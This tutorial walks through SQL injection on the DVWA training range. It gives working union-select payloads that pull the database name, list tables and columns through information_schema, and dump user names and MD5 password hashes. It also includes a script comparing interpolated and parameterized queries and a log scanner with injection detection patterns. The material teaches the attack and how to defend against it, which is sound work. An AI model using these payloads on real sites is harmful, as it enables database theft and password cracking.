SQL injection in penetration testing (2)

In the previous article, SQL Injection in Penetration Testing (1), I explained the principle of SQL injection, the types of SQL injection and some methods to prevent SQL injection. The following chapters will analyze SQL injection from examples.

First, let's analyze the low-level SQL injection exercise in the DVWA practice range.

There is a user id field that we need to fill in, so let's enter 1 and see what happens.

The record for user id 1 is returned. Recall the method for verifying SQL injection mentioned earlier: append a single quote after the 1, so we enter 1' and try it.

We can see that entering 1' causes the SQL statement to fail to parse, and the program ends up reporting an error.

From this we can make a preliminary judgement that there is an injection point here, and then check the source code to confirm it.

In the source code you can see the SQL statement, and you can see that the code below it does no filtering of our id parameter at all. This meets the conditions for injection: there is a controllable variable id, no filtering is done, and the statement is sent straight to the database for querying. Now that we know SQL injection exists here, how do we make use of it?

The following uses the MySQL database as an example.

First, there are a few functions we need to know before learning SQL injection:

database(): the database used by the current website

version(): the current version of MySQL

user(): the current MySQL user

When we do not know any conditions, we query as follows:

select <field name to be queried> from <database name>.<table name>

Then, according to the SQL statement we saw in the source, we can use a union query here:

1' union select 1,database()#

Here are a few things to pay attention to:

1. We need a single quote after the 1 to close the string literal in the original statement.

2. The number of fields selected by union select must be the same as in the original query. The original query returns two fields, so we select two: the constant 1 and database().

3. Finally, we must comment out the rest of the original statement with #, because in MySQL # starts a comment.

After entering this, you can see the name of the current database.
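As an added example (not code from the article or from DVWA), the following Python script reproduces the three points above on an in-memory SQLite database: a query built by string interpolation, the way the DVWA low level does it, next to the same query with a bound parameter. SQLite stands in for MySQL, so the comment marker is `-- ` instead of `#` and `sqlite_version()` replaces `database()`; the table contents and the query shape are constructed for the example, and the hash column holds placeholders rather than real digests.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (assumed shape;
# the password column holds placeholders, not real MD5 digests).
SAMPLE_ROWS = [
    (1, "admin", "admin", "<md5-placeholder-1>"),
    (2, "Gordon", "Brown", "<md5-placeholder-2>"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query_vulnerable(user_id):
    """Build the query the way the DVWA low level does: the input is spliced into
    the SQL text, so a quote in it closes the literal and the rest becomes SQL."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"


def run_vulnerable(conn, user_id):
    """Execute the interpolated query; a parse error is returned rather than
    raised so the caller sees the same symptom the article describes for 1'."""
    try:
        return ("ok", conn.execute(build_query_vulnerable(user_id)).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def run_parameterized(conn, user_id):
    """Execute the same query with a bound parameter: the input is always a single
    value compared against user_id and never becomes part of the SQL grammar."""
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()
    return ("ok", rows)


# The article's union payload adapted for SQLite: '-- ' is the comment marker in
# place of MySQL's '#', and sqlite_version() stands in for database().
UNION_PAYLOAD = "1' union select 1, sqlite_version()-- "
# The same idea with the wrong column count, to show why point 2 above matters.
BAD_COUNT_PAYLOAD = "1' union select 1-- "


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", UNION_PAYLOAD, BAD_COUNT_PAYLOAD):
        print(repr(probe))
        print("  interpolated :", run_vulnerable(db, probe))
        print("  parameterized:", run_parameterized(db, probe))
```

Running it shows the three outcomes side by side: the bare quote produces a parse error from the interpolated query, the union payload with a matching column count returns the admin row plus an attacker-chosen row, the payload with a mismatched column count errors out, and the parameterized query returns either the admin row or nothing for every probe, because the whole input is compared as one value.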

Once we know one piece of data, we can query with the following statement:

select <field name to be queried> from <database name>.<table name> where <known condition field name> = <value of known condition>

Because MySQL 5.0 and later ships with the built-in information_schema database, which records all database names, table names and column names on the current MySQL server, we can query it. The following are the names under which each piece of information is stored:

information_schema.schemata: the table that records database information

information_schema.tables: the table that records table name information

information_schema.columns: the table that records column name information

schema_name: database name

table_name: table name

column_name: column name

table_schema: database name (the database a table or column belongs to)

The '.' separates one level from the next (database.table). Knowing this, we can construct a SQL statement.

Above we already learned that the database name is dvwa, so we can dump the table names in dvwa:

1' union select 1,table_name from information_schema.tables where table_schema="dvwa"#

We can see a users table. A users table generally stores user information, so we dump the column names under the users table:

1' union select 1,column_name from information_schema.columns where table_name='users'#

Here you can see the user and password fields, which presumably store user names and user passwords, so let's query the contents of these fields:

1' union select 1,concat(user,password) from users#

This returns the account names together with the MD5 values of the passwords; the MD5 hashes can then be cracked to recover the user passwords.

These are the general steps of SQL injection. Of course, this is only a small part of SQL injection; some advanced injection techniques will be covered in subsequent articles.
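From the defender's side, every step above leaves a trace in the web server's access log: the single-quote probe, the union select, the information_schema lookups and the trailing # all travel in the id parameter. The following Python script, added here as an example and not part of the article, URL-decodes the query string of each request line and flags those indicators. The log lines are constructed for the example and follow the common combined format; the indicator list is a starting point, not a complete signature set.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines: one clean request to the DVWA SQLi page, the
# three probes from the article (URL-encoded as a browser would send them), and
# an unrelated request. None of these come from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 500 812
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /vulnerabilities/sqli/?id=1%27+union+select+1%2Cdatabase%28%29%23&Submit=Submit HTTP/1.1" 200 4400
10.0.0.5 - - [01/Jan/2024:10:00:29 +0000] "GET /vulnerabilities/sqli/?id=1%27union+select+1%2Ctable_name+from+information_schema.tables+where+table_schema%3D%22dvwa%22%23&Submit=Submit HTTP/1.1" 200 4800
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1500
"""

# Indicators drawn from the technique described in the article. They are checked
# against each decoded parameter value, so %27 and + encoding do not hide them.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE)),
    ("information_schema", re.compile(r"information_schema\.", re.IGNORECASE)),
    ("mysql-comment", re.compile(r"(#|--\s|/\*)")),
]

# Request line of the combined log format: method, target and protocol, then status.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_line(line):
    """Return a finding for one log line, or None if no indicator is present."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    target = match.group("target")
    parts = urlsplit(target)
    hits = []
    # parse_qsl decodes percent-escapes and '+' so the raw payload is inspected.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append(f"{name}:{label}")
    if not hits:
        return None
    return {"path": parts.path, "status": int(match.group("status")), "indicators": hits}


def scan_log(text):
    """Scan a whole log; return (line number, finding) pairs for flagged lines."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        finding = scan_line(line)
        if finding is not None:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {finding['path']} status={finding['status']} "
              f"indicators={', '.join(finding['indicators'])}")
```

The status code is kept in each finding because the sequence the article walks through, a 500 on the quote probe followed by 200s on union queries from the same client, is more telling than any single indicator: a single quote in a parameter on its own is common in legitimate input, while a quote immediately followed by union select and a MySQL comment marker rarely is.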
